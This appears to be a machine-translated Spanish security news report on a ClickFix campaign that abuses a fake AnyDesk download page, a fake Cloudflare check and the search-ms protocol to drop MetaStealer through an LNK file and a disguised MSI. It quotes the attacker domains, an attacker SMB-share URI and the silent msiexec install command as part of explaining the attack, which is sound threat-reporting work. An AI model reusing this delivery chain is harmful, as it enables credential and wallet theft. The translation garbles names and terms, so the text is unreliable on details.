Recientemente ha surgido una nueva variante del ataque ClickFix, disfrazado de un instalador legítimo de Anydesk para difundir el Infente de MetaTealer.
Esta campaña explota una página falsa de verificación de tendencia Cloudflare para atraer a las víctimas a ejecutar un controlador de protocolo de Windows diseñado, en última instancia, entregando un paquete MSI malicioso disfrazado de PDF.
A medida que las organizaciones continúan endureciendo sus defensas contra las técnicas tradicionales de ingeniería social, los actores de amenazas están evolucionando sus libros de jugadas, combinando señuelos familiares con componentes inesperados del sistema para evitar la detección y robar credenciales sensibles.
A principios de agosto, los usuarios que buscan la herramienta de acceso remoto Anydesk encontraron una página de destino engañosa en Anydeesk (.) Ink/Download/AnyDesk.html.
La página mostró lo que parecía ser una solicitud estándar del tono de nube CloudFlare, completo con un botón “Verifique que sean humanos”.
El enlace inicial que redirige a los usuarios a un toque falso de Cloudflare (fuente – cazadora)
Al hacer clic, las víctimas no fueron guiadas para pegar un comando en el cuadro de diálogo Ejecutar como en los ataques clásicos de ClickFix, sino que se redirigieron al Explorador de archivos de Windows a través del controlador URI Search-MS.
Investigadores de cazadores anotado Que este cambio sutil en el mecanismo de redirección aprovechó el protocolo de búsqueda de Windows menos monitoreado, atrapando a los equipos de seguridad fuera de la guardia.
Redirección del explorador de archivos de Windows a través de Search-MS (Fuente-Cazadora)
La cadena de infección se desarrolla cuando el URI de Search-MS invoca una SMB Remote SMB, entregando un archivo de acceso directo de Windows llamado “ReadMe Anydesk.pdf.lnk” al sistema de la víctima.
A diferencia de las variantes de FileFix que se basan en los comandos de PowerShell-PowerShell, este ataque, este ataque inicia automáticamente la carga útil LNK, que a su vez ejecuta un script para descargar e instalar dos componentes: el instalador genuino Anydesk alojado en Microsoft Edge para la plausibilidad, y un pdf de decoy servido de Chat1 (.) Store.
El archivo decoy es, de hecho, un paquete MSI que incorpora dinámicamente el nombre de host de la víctima en su URL de descarga aprovechando la variable % CompuTername % Environment. Una vez descargado, el MSI se instala a través de:-
MSIEXEC /I “%TEMP%\ %% CompuTername %%. MSI” /Quiet
Después de que se complete este comando, los metadatos revelan dos artefactos principales: un CustomActionDll responsable de orquestar la configuración y un archivo de CAB que contiene LS26.EXE, el gotero de MetaTealer y los scripts de limpieza.
Parámetro de nombre de nombre revelador de smb share (fuente – cazadora)
Los analistas de Huntress identificaron que LS26.exe está protegido con el protector privado EXE y exhibe comportamientos característicos de MetaStealer, incluida la recolección de credenciales de navegadores y robo de billetera criptográfica.
Mecanismo de infección
En el corazón de esta campaña se encuentra el ingenioso uso de la búsqueda de Windows. Al invocar el protocolo de Search-MS URI, los atacantes evitan las restricciones de diálogo Ejecutar en entornos endurecidos e introducen cargas útiles directamente a través del explorador de archivos.
El siguiente fragmento URI ilustra la redirección:-
Search-MS: DisplayName = Anydesk%20SeSecure%20Access; Crumb = Ubicación: \\ Attacle-SMB \ Share
Una vez que el usuario confirma el solicitante del explorador de archivos, el archivo LNK ejecuta silenciosamente las rutinas de descarga. CustomationDll de la MSI desencadena la recuperación de binary.bz.wrappedSetUpprogram, que desempaqueta ls26.exe y 1.js.
El archivo JavaScript garantiza la eliminación de archivos intermediarios, mientras que LS26.exe inicia la fase de exfiltración de datos.
Al abusar de los protocolos legítimos de Windows y el manejo de archivos, este ataque evade alertas de detección y seguridad de Sandbox hasta que la carga útil final desata su lógica maliciosa.
Esta táctica emergente subraya la importancia de monitorear extensiones no convencionales de las características de sistema confiable.
Los defensores deben considerar implementar estrictas políticas de controlador de protocolo, auditoría de SMB y análisis contextual de instalaciones de MSI para detectar e interrumpir estas sofisticadas campañas de ingeniería social.
Aumente su SOC y ayude a su equipo a proteger su negocio con inteligencia gratuita de amenazas de primer nivel: Solicitar prueba de prueba premium de búsqueda TI.
